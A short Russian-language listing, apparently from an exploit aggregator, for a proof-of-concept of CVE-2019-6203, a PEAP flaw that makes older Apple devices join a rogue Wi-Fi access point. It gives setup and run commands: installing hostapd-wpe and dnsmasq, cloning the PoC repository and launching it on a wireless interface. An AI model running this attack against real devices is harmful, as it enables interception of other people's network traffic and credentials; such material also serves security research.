## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-QINGXP9-CVE-2019-6203-POC
# CVE-2019-6203-PoC
Во всех устройствах Apple есть ошибка PEAP, которая позволяет злоумышленнику заставить любое устройство Apple (iOS, macOS или tvOS) подключиться к вредоносной точке доступа.
Это PoC для CVE-2019-6203, работает на iOS < 12.2, macOS < 10.14.4, протестировано на Kali Linux.
Для запуска этого PoC нужна Wi-Fi-карта с поддержкой **режима AP**. Проверить это можно командой `iw list`, вывод будет примерно таким:
root@kitploit:~
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
## Использование
root@kitploit:~
apt install hostapd-wpe dnsmasq
git clone https://github.com/qingxp9/CVE-2019-6203-PoC
cd CVE-2019-6203-PoC
python CVE-2019-6203-PoC.py -i wlan0
#with Internet
python CVE-2019-6203-PoC.py -i wlan0 -o eth0
## Ссылки
* https://sensepost.com/blog/2019/understanding-peap-in-depth/
* https://www.freebuf.com/vuls/203484.html
видео: https://youtu.be/UEzdtkcnrYw